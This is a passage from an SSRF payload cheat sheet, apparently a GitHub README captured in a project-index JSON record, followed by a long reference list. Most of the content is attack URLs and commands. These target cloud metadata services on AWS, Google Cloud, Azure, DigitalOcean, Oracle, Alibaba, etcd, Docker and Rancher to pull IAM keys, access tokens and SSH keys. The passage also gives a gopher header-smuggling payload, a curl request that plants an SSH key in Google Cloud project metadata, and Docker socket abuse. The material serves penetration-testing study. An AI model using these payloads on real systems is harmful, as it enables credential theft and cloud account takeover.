system access on an ECS instance, try extracting `/proc/self/environ` to get UUID.\n\n```powershell\ncurl http://169.254.170.2/v2/credentials/\u003cUUID\u003e\n```\n\nThis way you'll extract IAM keys of the attached role\n\n### SSRF URL for AWS Elastic Beanstalk\n\nWe retrieve the `accountId` and `region` from the API.\n\n```powershell\nhttp://169.254.169.254/latest/dynamic/instance-identity/document\nhttp://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role\n```\n\nWe then retrieve the `AccessKeyId`, `SecretAccessKey`, and `Token` from the API.\n\n```powershell\nhttp://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role\n```\n\n![notsosecureblog-awskey](https://www.notsosecure.com/wp-content/uploads/2019/02/aws-cli.jpg)\n\nThen we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`.\n\n\n### SSRF URL for AWS Lambda\n\nAWS Lambda provides an HTTP API for custom runtimes to receive invocation events from Lambda and send response data back within the Lambda execution environment.\n\n```powershell\nhttp://localhost:9001/2018-06-01/runtime/invocation/next\n$ curl \"http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next\"\n```\n\nDocs: https://docs.aws.amazon.com/lambda/latest/dg/runtimes-api.html#runtimes-api-next\n\n### SSRF URL for Google Cloud\n\n:warning: Google is shutting down support for usage of the **v1 metadata service** on January 15.\n\nRequires the header \"Metadata-Flavor: Google\" or \"X-Google-Metadata-Request: True\"\n\n```powershell\nhttp://169.254.169.254/computeMetadata/v1/\nhttp://metadata.google.internal/computeMetadata/v1/\nhttp://metadata/computeMetadata/v1/\nhttp://metadata.google.internal/computeMetadata/v1/instance/hostname\nhttp://metadata.google.internal/computeMetadata/v1/instance/id\nhttp://metadata.google.internal/computeMetadata/v1/project/project-id\n```\n\nGoogle allows recursive pulls\n\n```powershell\nhttp://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true\n```\n\nBeta does NOT require a header atm (thanks Mathias Karlsson @avlidienbrunn)\n\n```powershell\nhttp://metadata.google.internal/computeMetadata/v1beta1/\nhttp://metadata.google.internal/computeMetadata/v1beta1/?recursive=true\n```\n\nRequired headers can be set using a gopher SSRF with the following technique\n\n```powershell\ngopher://metadata.google.internal:80/xGET%20/computeMetadata/v1/instance/attributes/ssh-keys%20HTTP%2f%31%2e%31%0AHost:%20metadata.google.internal%0AAccept:%20%2a%2f%2a%0aMetadata-Flavor:%20Google%0d%0a\n```\n\nInteresting files to pull out:\n\n- SSH Public Key : `http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json`\n- Get Access Token : `http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token`\n- Kubernetes Key : `http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json`\n\n#### Add an SSH key\n\nExtract the token\n\n```powershell\nhttp://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token?alt=json\n```\n\nCheck the scope of the token\n\n```powershell\n$ curl https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=ya29.XXXXXKuXXXXXXXkGT0rJSA  \n\n{ \n        \"issued_to\": \"101302079XXXXX\", \n        \"audience\": \"10130207XXXXX\", \n        \"scope\": \"https://www.googleapis.com/auth/compute https://www.googleapis.com/auth/logging.write https://www.googleapis.com/auth/devstorage.read_write https://www.googleapis.com/auth/monitoring\", \n        \"expires_in\": 2443, \n        \"access_type\": \"offline\" \n}\n```\n\nNow push the SSH key.\n\n```powershell\ncurl -X POST \"https://www.googleapis.com/compute/v1/projects/1042377752888/setCommonInstanceMetadata\" \n-H \"Authorization: Bearer ya29.c.EmKeBq9XI09_1HK1XXXXXXXXT0rJSA\" \n-H \"Content-Type: application/json\" \n--data '{\"items\": [{\"key\": \"sshkeyname\", \"value\": \"sshkeyvalue\"}]}'\n```\n\n### SSRF URL for Digital Ocean\n\nDocumentation available at `https://developers.digitalocean.com/documentation/metadata/`\n\n```powershell\ncurl http://169.254.169.254/metadata/v1/id\nhttp://169.254.169.254/metadata/v1.json\nhttp://169.254.169.254/metadata/v1/ \nhttp://169.254.169.254/metadata/v1/id\nhttp://169.254.169.254/metadata/v1/user-data\nhttp://169.254.169.254/metadata/v1/hostname\nhttp://169.254.169.254/metadata/v1/region\nhttp://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address\n\nAll in one request:\ncurl http://169.254.169.254/metadata/v1.json | jq\n```\n\n### SSRF URL for Packetcloud\n\nDocumentation available at `https://metadata.packet.net/userdata`\n\n### SSRF URL for Azure\n\nLimited, maybe more exists? `https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/`\n\n```powershell\nhttp://169.254.169.254/metadata/v1/maintenance\n```\n\nUpdate Apr 2017, Azure has more support; requires the header \"Metadata: true\" `https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service`\n\n```powershell\nhttp://169.254.169.254/metadata/instance?api-version=2017-04-02\nhttp://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02\u0026format=text\n```\n\n### SSRF URL for OpenStack/RackSpace\n\n(header required? unknown)\n\n```powershell\nhttp://169.254.169.254/openstack\n```\n\n### SSRF URL for HP Helion\n\n(header required? unknown)\n\n```powershell\nhttp://169.254.169.254/2009-04-04/meta-data/ \n```\n\n### SSRF URL for Oracle Cloud\n\n```powershell\nhttp://192.0.0.192/latest/\nhttp://192.0.0.192/latest/user-data/\nhttp://192.0.0.192/latest/meta-data/\nhttp://192.0.0.192/latest/attributes/\n```\n\n### SSRF URL for Alibaba\n\n```powershell\nhttp://100.100.100.200/latest/meta-data/\nhttp://100.100.100.200/latest/meta-data/instance-id\nhttp://100.100.100.200/latest/meta-data/image-id\n```\n\n### SSRF URL for Kubernetes ETCD\n\nCan contain API keys and internal ip and ports\n\n```powershell\ncurl -L http://127.0.0.1:2379/version\ncurl http://127.0.0.1:2379/v2/keys/?recursive=true\n```\n\n### SSRF URL for Docker\n\n```powershell\nhttp://127.0.0.1:2375/v1.24/containers/json\n\nSimple example\ndocker run -ti -v /var/run/docker.sock:/var/run/docker.sock bash\nbash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json\nbash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json\n```\n\nMore info:\n\n- Daemon socket option: https://docs.docker.com/engine/reference/commandline/dockerd/#daemon-socket-option\n- Docker Engine API: https://docs.docker.com/engine/api/latest/\n\n### SSRF URL for Rancher\n\n```powershell\ncurl http://rancher-metadata/\u003cversion\u003e/\u003cpath\u003e\n```\n\nMore info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-service/\n\n\n## References\n\n- [AppSecEU15-Server_side_browsing_considered_harmful.pdf](https://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf)\n- [Extracting AWS metadata via SSRF in Google Acquisition - tghawkins - 2017-12-13](https://hawkinsecurity.com/2017/12/13/extracting-aws-metadata-via-ssrf-in-google-acquisition/)\n- [ESEA Server-Side Request Forgery and Querying AWS Meta Data](http://buer.haus/2016/04/18/esea-server-side-request-forgery-and-querying-aws-meta-data/) by Brett Buerhaus\n- [SSRF and local file read in video to gif converter](https://hackerone.com/reports/115857)\n- [SSRF in https://imgur.com/vidgif/url](https://hackerone.com/reports/115748)\n- [SSRF in proxy.duckduckgo.com](https://hackerone.com/reports/358119)\n- [Blind SSRF on errors.hackerone.net](https://hackerone.com/reports/374737)\n- [SSRF on *shopifycloud.com](https://hackerone.com/reports/382612)\n- [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)\n- [Awesome URL abuse for SSRF by @orange_8361 #BHUSA](https://twitter.com/albinowax/status/890725759861403648)\n- [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! Orange Tsai](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)\n- [#HITBGSEC 2017 SG Conf D1 - A New Era Of SSRF - Exploiting Url Parsers - Orange Tsai](https://www.youtube.com/watch?v=D1S-G8rJrEk)\n- [SSRF Tips - xl7dev](http://blog.safebuff.com/2016/07/03/SSRF-Tips/)\n- [SSRF in https://imgur.com/vidgif/url](https://hackerone.com/reports/115748)\n- [Les Server Side Request Forgery : Comment contourner un pare-feu - @Geluchat](https://www.dailysecurity.fr/server-side-request-forgery/)\n- [AppSecEU15 Server side browsing considered harmful - @Agarri](http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf)\n- [Enclosed alphanumerics - @EdOverflow](https://twitter.com/EdOverflow)\n- [Hacking the Hackers: Leveraging an SSRF in HackerTarget - @sxcurity](http://www.sxcurity.pro/2017/12/17/hackertarget/)\n- [PHP SSRF @secjuice](https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51)\n- [How I convert SSRF to xss in a ssrf vulnerable Jira](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)\n- [Piercing the Veil: Server Side Request Forgery to NIPRNet access](https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a)\n- [Hacker101 SSRF](https://www.youtube.com/watch?v=66ni2BTIjS8)\n- [SSRF脆弱性を利用したGCE/GKEインスタンスへの攻撃例](https://blog.ssrf.in/post/example-of-attack-on-gce-and-gke-instance-using-ssrf-vulnerability/)\n- [SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1 - SaN ThosH - 10 Jan 2019](https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978)\n- [SSRF Protocol Smuggling in Plaintext Credential Handlers : LDAP - @0xrst](https://www.silentrobots.com/blog/2019/02/06/ssrf-protocol-smuggling-in-plaintext-credential-handlers-ldap/)\n- [X-CTF Finals 2016 - John Slick (Web 25) - YEO QUAN YANG @quanyang](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/)\n- [Exploiting SSRF in AWS Elastic Beanstalk - February 1, 2019 - @notsosecure](https://www.notsosecure.com/exploiting-ssrf-in-aws-elastic-beanstalk/)\n- [PortSwigger - Web Security Academy Server-side request forgery (SSRF)](https://portswigger.net/web-security/ssrf)\n- [SVG SSRF Cheatsheet - Allan Wirth (@allanlw) - 12/06/2019](https://github.com/allanlw/svg-cheatsheet)\n- [SSRF’s up! Real World Server-Side Request Forgery (SSRF) - shorebreaksecurity - 2019](https://www.shorebreaksecurity.com/blog/ssrfs-up-real-world-server-side-request-forgery-ssrf/)\n- [challenge 1: COME OUT, COME OUT, WHEREVER YOU ARE!](https://www.kieranclaessens.be/cscbe-web-2018.html)\n- [Attacking Url's in JAVA](https://blog.pwnl0rd.me/post/lfi-netdoc-file-java/)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpaulveillard%2Fcybersecurity-ssrf","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fpaulveillard%2Fcybersecurity-ssrf","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpaulveillard%2Fcybersecurity-ssrf/lists"}